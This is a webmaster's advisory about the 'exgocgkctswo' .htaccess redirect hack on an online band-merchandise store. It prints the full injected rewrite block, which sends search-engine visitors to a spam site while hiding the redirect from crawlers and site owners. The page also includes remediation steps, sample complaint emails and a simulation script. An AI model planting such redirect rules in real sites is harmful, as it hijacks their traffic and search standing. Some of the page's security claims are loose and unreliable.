302 REDIRECT htaccess Hack

No-Spam!!!
v(0.7)

THE PROBLEM: .htaccess 302 redirect hack

You notice an EXTREMELY RAPID and marked decline in traffic to your site.
You may be a victim of this evil hack!
The basic idea of this hack is that the spam bot acquires your FTP login * and logs into your site. It then replaces your .htaccess files with ones that send your traffic to the spammers and then round-robin it back to you. To the search engines this makes it look as if they are getting YOUR website's traffic, and once discovered it will cause search engines to drop your site from their indexes!!!! Worse, nothing changes for you except fewer and fewer visitors!! Your traffic will drop, you may never be notified, and having done nothing at all your business goes kerplunk!!!

*Most typically, and surprisingly, FTP clients send everything in CLEAR TEXT, so they put a listener on port 21 and just grab your login RIGHT OUT OF THE AIR when you FTP in!! So change your protocol to SFTP.
Less likely, but just as effective, is that you have a weak password and your account is hacked.
Either way they "hijack" your account.

PASSWORD RECOMMENDED CONVENTIONS

WEAK PASSWORDS: bob, webmaster, mysite, mydog, mybirthdate, lucky39, etc. <-- DO NOT USE, DON'T DO!!!
STRONG PASSWORDS: TjB6pbt3, TjB6pbt3, uBp7RjtM, or longer t1VYxt92Y9KQrO <-- USE combinations of upper and lower case letters and numbers.
Strong passwords as you can see are NOT human friendly to you either!


If none of this sounds familiar, or you are not technical, STOP READING NOW. This does not apply to you, thanks!


ORIGINAL TYPICAL .htaccess

Don't worry if you don't understand the directives!

DirectoryIndex /mm5/merchant.mvc
Options +FollowSymlinks
RewriteEngine On
# desc: defines rewrite rules for static links
RewriteCond %{REQUEST_URI} ^/p/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/pc/(.*)/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Category_Code=%2&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/c/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=CTGY&Category_Code=%1&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/s/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Links&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/t/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Help&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/u/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Info&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/v/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PLST&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/w/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=OINF&Store_Code=N [L]
#RewriteCond %{REQUEST_URI} ^/x/(.*) [NC]
#RewriteRule (.*) /mm5/merchant.mvc?Screen=BASK&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/y/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SFNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/z/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=AFCL&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/q/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=ACNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/r/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=LOGN&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/k/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=ACNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/m/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=AllNames&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/f/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SizeCharts&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/music/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsA&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/modern_punk_clothing/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsB&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/unisex_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsC&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/emo_wear/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_D&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_tee-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_E&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/vintage_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Hoodies_F&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/clothes/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Hoodies_G&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/british_underground/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_Girls_H&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/alternative_pop/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Heavy_Metal_T-Shirts_I&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_and_roll_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Tees_J&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/new_wave/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Rock_T-Shirts_K&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/post-punk/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Clothing_L&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rockabilly_merchandise/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Vintage_Clothing_M&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/classic_rock_hoodies/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_60s_Clothes_N&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/art_rock_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_70s_Clothes_O&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_clothes/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_80s_Clothes_P&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/hard_core_punk_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_90s_Clothes_Q&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/gothic_rock/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Alternative_Punk_Clothes_R&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Goth_T-shirts_S&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/punk_rock_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Rock_Girls_Shirts_T&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/stadium_rock_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Hoodies_U&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_clothing/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Leather_V&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Rock_Accessories_W&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_clothes_collection/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Moovies_Memorabilia_X&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Long_Sleeve_T-Shirts_Y&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/heavy_metal/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Pins_Buttons_Z&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/slogan_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=&Rock_Bands_Longsleeve_Shirts_Store_Code=N [L]



RewriteCond %{REQUEST_URI} ^/n/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=BandsOnTour&Store_Code=N [L]

#added for calc support
RewriteCond %{REQUEST_URI} ^/az/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SRCH&Search=%1&Offset=0&filter_cat=&srch_name=1&range_low=&range_high=&PowerSearch_Begin_Only=1 [L]

### Begin - Inserted by Miva Merchant
DirectoryIndex /mm5/merchant.mvc?Screen=SFNT
RewriteEngine On
RewriteRule ^mm5/admin.mvc? - [L]

RewriteCond %{REQUEST_FILENAME} !-s
RewriteRule ^product/([^/.]+).html$ /mm5/merchant.mvc?Screen=PROD&Product_code=$1 [L]

RewriteCond %{REQUEST_FILENAME} !-s
RewriteRule ^category/([^/.]+).html$ /mm5/merchant.mvc?Screen=CTGY&Category_code=$1 [L]

RewriteCond %{REQUEST_FILENAME} !-s
RewriteRule ^product/([^/]+)/([^/.]+).html$ /mm5/merchant.mvc?Screen=PROD&Category_code=$1&Product_code=$2 [L]


RewriteCond %{REQUEST_FILENAME} !-s
RewriteRule ^([^/.]+).html$ /mm5/merchant.mvc?Screen=$1 [L]

### End - Inserted by Miva Merchant


HACKED .htaccess

Note the author bot: exgocgkctswo!!
HACK STARTS -- This is appended to THE TOP or BOTTOM of, or replaces, your existing .htaccess file.


# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://jesusonlynet.org/cgi-bin/r.cgi?p=15002&i=0ae385fb&j=331&m=73cef294f4f88039b81560468d32931c&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo
HACK ENDS -- Below is the original .htaccess file.

#-----------------------------------------------------------------------------
# file: .htacess file
# desc: acidmerch
# date: 2009/05/31
# auth: webmaster
# copy: (C) Copyright 2009 acidmerch, All Rights Reserved.
# -----------------------------------------------------------------------------
Options +FollowSymlinks
RewriteEngine On

# our home page
DirectoryIndex /mm5/merchant.mvc
#DirectoryIndex /mm5/merchant.mvc?Screen=SFNT
# redirect no www request to www,ie acidmerch.com <==> www.acidmerch.com
RewriteCond %{HTTP_HOST} !^www.acidmerch.com$
RewriteRule ^(.*) http://www.acidmerch.com/$1 [R=301,L]

# Defines rewrite rules for dynamic to static links
RewriteCond %{REQUEST_URI} ^/p/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/pc/(.*)/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Category_Code=%2&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/c/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=CTGY&Category_Code=%1&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/s/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Links&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/t/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Help&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/u/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Info&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/v/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PLST&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/w/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=OINF&Store_Code=N [L]
#RewriteCond %{REQUEST_URI} ^/x/(.*) [NC]
#RewriteRule (.*) /mm5/merchant.mvc?Screen=BASK&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/y/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SFNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/z/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=AFCL&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/q/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=ACNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/r/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=LOGN&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/k/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=ACNT&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/m/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=AllNames&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/f/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SizeCharts&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/music/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsA&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/modern_punk_clothing/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsB&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/unisex_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=RockBandsC&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/emo_wear/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_D&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_tee-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_E&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/vintage_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Hoodies_F&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/clothes/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Hoodies_G&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/british_underground/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Shirts_Girls_H&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/alternative_pop/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Heavy_Metal_T-Shirts_I&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_and_roll_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Tees_J&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/new_wave/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Rock_T-Shirts_K&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/post-punk/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Clothing_L&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rockabilly_merchandise/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Vintage_Clothing_M&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/classic_rock_hoodies/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_60s_Clothes_N&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/art_rock_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_70s_Clothes_O&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_clothes/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_80s_Clothes_P&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/hard_core_punk_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_90s_Clothes_Q&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/gothic_rock/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Alternative_Punk_Clothes_R&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Goth_T-shirts_S&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/punk_rock_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Rock_Girls_Shirts_T&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/stadium_rock_bands/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Concert_Hoodies_U&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_clothing/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Leather_V&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/band_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Punk_Rock_Accessories_W&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_clothes_collection/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Moovies_Memorabilia_X&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/rock_tees/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Long_Sleeve_T-Shirts_Y&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/heavy_metal/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=Rock_Pins_Buttons_Z&Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/slogan_t-shirts/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=&Rock_Bands_Longsleeve_Shirts_Store_Code=N [L]
RewriteCond %{REQUEST_URI} ^/n/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=BandsOnTour&Store_Code=N [L]

#added for calc support
RewriteCond %{REQUEST_URI} ^/az/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=SRCH&Search=%1&Offset=0&filter_cat=&srch_name=1&range_low=&range_high=&PowerSearch_Begin_Only=1 [L]

#banned users, bots, bad guys

order allow,deny
deny from 65.182.208.101
deny from 58.147.114.99
allow from all

# Keep prying eyes out! 10/22/09 per a-man!
RewriteCond %{http_user_agent} !(googlebot|Msnbot|Slurp) [NC]
RewriteRule ^robots\.txt$ http://www.acidmerch.com/ [R,NE,L]
AddHandler application/x-httpd-php .txt


#RewriteRule ^ANBER0002BL(.*)\.html http://www.acidmerch.com/p/ANBER0002BL/Anberlin+Tshirts++Eyes+Tee.html
# 404 Errors, Missing pages redirection
ErrorDocument 404 /errors/404.php
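
The condition chain in the injected block explains why the site owner sees nothing wrong. The following is an added example, not code from the original page: it evaluates a shortened copy of those RewriteCond lines against constructed requests. The redirect host, the abbreviated user-agent list and the sample requests are assumptions made for illustration.

```python
import re

# Constructed sample: the injected block's condition chain with the long
# user-agent lists abbreviated and a placeholder redirect host.
INJECTED = r"""
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|Crawl|curl|Google|Linux|Python|wget|Yahoo).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://redirector.example/r.cgi [R=302,L]
"""

COND = re.compile(
    r"^\s*RewriteCond\s+%\{(\w+)\}\s+(!?)(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)

def parse_conds(text):
    """Return (variable, negated, compiled_regex) for each RewriteCond line."""
    conds = []
    for line in text.splitlines():
        m = COND.match(line)
        if m:
            var, neg, pattern, flags = m.groups()
            nocase = "NC" in (flags or "").upper().split(",")
            conds.append((var.upper(), neg == "!",
                          re.compile(pattern, re.I if nocase else 0)))
    return conds

def would_redirect(conds, request):
    """Consecutive RewriteCond lines are ANDed (this block uses no [OR])."""
    for var, negated, rx in conds:
        matched = rx.search(request.get(var, "")) is not None
        if matched == negated:      # a plain cond missed, or a negated one hit
            return False
    return True

BROWSER = "Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0"
SEARCH = "http://www.google.com/search?q=band+shirts"

def request(referer="", agent=BROWSER, cookie=""):
    """Build a constructed request as the server variables mod_rewrite sees."""
    return {"REQUEST_METHOD": "GET", "HTTP_REFERER": referer,
            "HTTP_USER_AGENT": agent, "HTTP_COOKIE": cookie, "HTTPS": "off"}

SAMPLES = {
    "owner_direct": request(),                      # owner types the URL
    "search_visitor": request(SEARCH),              # first click from a search result
    "returning_visitor": request(SEARCH, cookie="xccgtswgokoe=1"),
    "curl_check": request(SEARCH, agent="curl/7.19.7"),
    "googlebot": request(agent="Mozilla/5.0 (compatible; Googlebot/2.1; "
                               "+http://www.google.com/bot.html)"),
}

def classify_samples():
    """Map each constructed request to True if the injected rule would fire."""
    conds = parse_conds(INJECTED)
    return {name: would_redirect(conds, req) for name, req in SAMPLES.items()}

if __name__ == "__main__":
    for name, fires in classify_samples().items():
        print(f"{name:18} redirected={fires}")
```

Only the first-time visitor arriving from a search result is redirected, so a check made by typing the URL, or with curl or wget, shows a healthy site. The CO flag in the page's rule sets the cookie with a lifetime of 10080 minutes, so the same visitor is not redirected again for a week.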


SOLUTION -- STEPS

SPECIAL NOTE:

Once you break the current hacked .htaccess file, if your replacement doesn't work, especially in the case of MIVA, you may break your sites. So be careful!!!
Worst case, rename your hacked file to get it up and running until you can debug the replacement.

Sites to report, Originators of this hack

http://www.lucky-hosting.com/
http://jesusonlynet.org


RELATED RESEARCH

A few good general articles on this kind of spammer

How To Stop Spammers, Comment Spam, etc.
Htaccess hack # exgocgkctswo
Requesting GOOGLE reconsideration of your site
FAQ: Crawling, indexing & ranking
.htaccess files
Tips on requesting reconsideration



SAMPLE HOSTING EMAIL

Dear Hosting

We have noticed an EXTREMELY RAPID and marked decline in traffic to our sites hosted at XXXXXXXXX. We have been reviewing all component parts and found .htaccess files {LIST LOCATIONS HERE; typically at least one at / or root_doc} which are NOT our content (I am the SOLE FTP access). Googling the author's name at the top of the file, exgocgkctswo, revealed among the first few responses a URL which was short and informative:

http://forum.joomla.org/viewtopic.php?p=2260562

which has an IDENTICAL hacked .htaccess file!!!
Its sole purpose is to REDIRECT TRAFFIC TO THE SPAMMER'S SITE!!!
It targets weak FTP passwords.

We are sending you this because not 1 but 2 of our sites hosted by you were attacked.
This is to alert you, for all your hosting users, of this potential and serious danger
and to request that you change the FTP access to:

USERNAME: sampleftpuser
PASSWORD: sa0xGs1LJip5LVddSNNlj8mLD3FwM1EGzvR

As soon as you change it I will restore the .htaccess file

Thank You for your Critical and Urgent attention
{YOUR NAME}
Webmaster


SAMPLE GOOGLE RECONSIDERATION EMAIL

Dear Google,

Hello, I am Rob XXXXX, webmaster for
We have noticed an EXTREMELY RAPID and marked decline in traffic to our site. We have been reviewing all component parts and found that the main .htaccess files {LIST LOCATIONS HERE; typically at least one at /, /html, htdocs/, DOCROOT} contain content of unknown origin. There is limited access and I am the SOLE FTP access. Googling the bot author's name at the top of the file, exgocgkctswo, revealed among the first few responses a URL which was short and informative:


http://forum.joomla.org/viewtopic.php?p=2260562

which has an IDENTICAL hacked .htaccess file!!!

One of its purposes is to REDIRECT TRAFFIC TO THE SPAMMER'S SITE!!!
It targets weak FTP passwords.
It also creates false traffic to their sites, potential harm to visitors, and has significantly lowered our traffic.

REMEDIAL STEPS

  • We IMMEDIATELY confirmed and changed all access from FTP to SFTP.
  • We changed all passwords.*
  • .htaccess
    -- Identified the sites involved
    -- We removed all hacked content including the 302 redirect
  • Alerted hosting.
  • Posted public service announcements (PSA) of the hosting accounts and several locations:
    -- http://splido.com/hackTrak/
  • Reviewed and implemented tips from Google's "Tips on requesting reconsideration"
  • After all the work and research, we changed all passwords one last time.

* The FTP passwords were changed and are very strong and secure and provide 48 Bit encryption. They would require possibly several millions of guess attempts in order for someone to guess your FTP password. The security on our servers only allows a maximum of 144 FTP password attempts in a 24 hour period.

We feel we have done everything possible and are secure and ready to resume business. We ask you to reconsider our site, and ask for any help you can offer in alerting the proper authorities regarding this type of activity.
Thank You for your attention
{YOUR NAME}
Webmaster


UPDATES

We have discovered that the hack is not limited to the root and secondary directories but can be extensive, affecting as much as ALL the directories. One site had HUNDREDS of affected files!!!
Obviously this is difficult to locate as well as identify, so I wrote a program to scan for it, which is available to you as well. Just put it somewhere on your server and run it. I made it a single-file utility for ease of use.

scan.php --Run it on THIS server
scan.php -- View source
README.txt
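
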